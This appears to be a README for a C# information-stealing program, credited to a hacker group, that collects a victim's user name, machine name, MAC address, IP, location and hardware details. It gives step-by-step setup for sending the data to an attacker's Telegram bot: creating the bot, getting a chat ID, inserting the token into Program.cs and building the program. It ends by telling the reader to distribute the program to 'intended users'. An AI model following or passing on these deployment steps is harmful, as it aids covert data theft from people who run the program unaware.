- Steal UserName
- Steal Machine Name
- Show active windows
- Show path where file was started
- Show Operating system
- Show screen metrics
- Show CPU
- Show GPU
- Show RAM
- Show IP
- Show Country
- Show City
- Steal MAC Address
- Open the Telegram app or visit the Telegram website.
- Search for the BotFather bot.
- Start a chat with the BotFather and follow the instructions to create a new bot.
- Once the bot is created, you will be provided with a token which is used to authenticate your bot.
- Set up the bot's profile picture, name, and description as necessary.
- Add the bot to the group chat where you want to collect chat id.
- Send a message to the group chat.
- Use the Telegram API to get the chat id of the group chat.
- You can use a bot like https://t.me/cid_bot to get the chat id of any user or group chat.
Simply add the bot to the chat and send the command /start. The bot will reply with the chat id.
-
Open the C# project in Visual Studio.
-
Go to the Program.cs file.
-
In that file, search for the variables or constants that store the Telegram bot token and chat ID.
-
Replace the existing Telegram bot token and chat ID with your own values.
private static string _botToken = "Your Bot Token";
private static long _chatId = Your_Chat_ID;
-
Save the changes to the file.
-
Build the project to ensure that the changes are properly integrated.
-
Test the program to ensure that it works as intended, and that the Telegram bot can receive messages and perform the desired actions.
-
If the program works as expected, you can distribute it to your intended users.
-Credit:
- Dev Name: Md Rahadul Islam
- Education: Class 10
- Group: Emperor Hacker's Community
- Facebook: https://facebook.com/rahad-infosec
- Thanks!